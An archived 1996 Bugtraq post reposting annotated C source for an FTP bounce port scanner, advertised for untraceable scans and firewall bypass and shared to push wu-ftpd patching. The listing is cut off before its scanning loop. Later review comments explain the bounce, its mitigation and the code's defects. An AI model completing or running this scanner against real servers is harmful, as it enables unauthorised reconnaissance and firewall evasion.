From: SMTP%"BUGTRAQ@NETSPACE.ORG" 5-AUG-1996 19:28:29.50 To: EVERHART CC: Subj: BoS: ftp port scanner Resent-Date: Sun, 4 Aug 1996 19:16:35 +1000 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved-By: Aleph One Message-ID: Date: Sun, 4 Aug 1996 00:30:14 -0700 Reply-To: Bugtraq List Sender: proff@suburbia.net From: Aleph One To: Multiple recipients of list BUGTRAQ Resent-Message-ID: <"i1sbY1.0.bE1.of61o"@suburbia> Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/187 X-Loop: best-of-security@suburbia.net Precedence: list Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: ftp port scanner From: Kit Knox Here is some code I posted to bugtraq a few months ago that Scott chose to either censor for some reason or was lost. I'm reposting it again so everyone will be inspired to patch their ftpd's. I recommend the following -> ftp://ftp.academ.com/pub/wu-ftpd/private/wu-ftpd-2.4.2-beta-11.tar.Z NOTE: This is just a demo. Email among other things may be sent via this same "bug". Code compiled under linux/solaris. Mileage may vary. /* * FTP Scan (C) 1996 Kit Knox * * Exploits bug in FTP protocol that allows user to connect to arbritary * IP address and port. * * Features: Untraceable port scans. Bypass firewalls! 
*
 * Example usage:
 *
 *   ftp-scan ftp.cdrom.com 127.0.0.1 0 1024
 *
 * This will scan IP 127.0.0.1 from ftp.cdrom.com from port 0 to 1024
 *
 * NOTE(review): this is the classic "FTP bounce": the client logs in
 * anonymously and issues PORT with a third-party address, so the FTP
 * server, not the client, opens the data connection to that address.
 * The author's own mitigation is the patched ftpd linked in the post;
 * a server that refuses (and logs) a PORT whose address differs from
 * the control connection's peer defeats this outright.
 */

/* NOTE(review): the header names after each #include were lost when the
 * post was extracted; the seven bare #include lines are reproduced as
 * found, so this listing does not compile as-is. */
#include
#include
#include
#include
#include
#include
#include

int sock;          /* control connection to the FTP server; set by rconnect() */
char line[1024];   /* last control-connection line collected by readln() */

/*
 * Resolve `server` and open a TCP connection to its port 21, leaving the
 * descriptor in the global `sock`.  Exits the process if the name does not
 * resolve.  Neither the socket() nor the connect() result is checked, so a
 * refused or unreachable server is only noticed later when send()/read()
 * misbehave.
 */
void rconnect(char *server)
{
    struct sockaddr_in sin;
    struct hostent *hp;

    hp = gethostbyname(server);
    if (hp==NULL) {
        printf("Unknown host: %s\n",server);
        exit(0);
    }
    bzero((char*) &sin, sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(21);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    connect(sock,(struct sockaddr *) &sin, sizeof(sin));  /* return value ignored */
}

/*
 * Anonymous login on `sock`: sends "USER ftp", waits one second, then sends
 * "PASS user@".  No reply is read here; main() scans the replies afterwards.
 * Note the commands end in a bare LF rather than the CRLF the FTP protocol
 * specifies, which some servers tolerate and others do not.
 */
void login(void)
{
    char buf[1024];
    sprintf(buf,"USER ftp\n");
    send(sock, buf, strlen(buf),0);
    sleep(1);
    sprintf(buf,"PASS user@\n");
    send(sock, buf, strlen(buf),0);
}

/*
 * Read one line from `sock`, a byte at a time, into the global `line`,
 * NUL-terminating it after the '\n'.
 *
 * Defects visible here, left as found:
 *  - `i` is never compared with sizeof line, so a reply longer than 1023
 *    bytes overflows the global buffer.
 *  - the read() result `w` is never examined, so EOF or an error does not
 *    end the loop; the stale byte in tmp[0] is re-examined instead.
 *  - read() is called with four arguments (recv-style); this only compiled
 *    on the old systems the post mentions, where no prototype was in scope.
 */
void readln(void)
{
    int i,done=0,w;
    char tmp[1];
    sprintf(line,"");   /* empties line[]; equivalent to line[0] = 0 */
    i = 0;
    while (!done) {
        w=read(sock,tmp, 1, 0);
        if (tmp[0] != 0) {   /* NUL bytes are skipped but still advance i */
            line[i] = tmp[0];
        }
        if (line[i] == '\n') {
            done = 1;
        }
        i++;
    }
    line[i] = 0;
}

/*
 * Write the NUL-terminated string `s` verbatim to `sock`.  The [1024] in
 * the parameter is documentation only: the array decays to char * and no
 * length is enforced.  The send() result is not checked.
 */
void sendln(char s[1024])
{
    send(sock, s, strlen(s),0);
}

/* Mask a byte to 0..255 for the decimal octets of a PORT argument; the
 * macro argument is not parenthesized, so pass only simple expressions. */
#define UC(b) (((int)b)&0xff)

/*
 * Entry point: ftp-scan ftp_server scan_host loport hiport.
 * Resolves scan_host into `sin`, connects to ftp_server via rconnect(),
 * logs in anonymously, then builds the comma-separated octet string
 * `adr` used for the PORT command.  Declared void rather than int, and
 * loport/hiport are parsed with atoi(), so non-numeric input silently
 * becomes 0.
 */
void main(int argc, char **argv)
{
    char buf[1024];
    int i;
    u_short sport,eport;
    register char *p,*a;
    struct hostent *hp;
    struct sockaddr_in sin;
    char adr[1024];

    if (argc != 5) {
        printf("usage: ftp-scan ftp_server scan_host loport hiport\n");
        exit(-1);
    }
    hp = gethostbyname(argv[2]);
    if (hp==NULL) {
        printf("Unknown host: %s\n",argv[2]);
        exit(0);
    }
    bzero((char*) &sin, sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    rconnect(argv[1]);
    /* Login anon to server */
    login();
    /* Make sure we are in: read up to 200 reply lines looking for the
     * "230 Guest" greeting; setting i = 200 ends the loop early.  If the
     * greeting never arrives the program carries on regardless. */
    for (i=0; i<200; i++) {
        readln();
        if (strstr(line,"230 Guest")) {
            printf("%s",line);
            i = 200;
        }
    }
    a=(char *)&sin.sin_addr;
    sport = atoi(argv[3]);
    eport = atoi(argv[4]);
    sprintf(adr,"%i,%i,%i,%i",UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]));
    /* NOTE(review): the remainder of main() lies beyond the end of this
     * excerpt; the line below is reproduced exactly as it was cut. */
    for (i=sport; i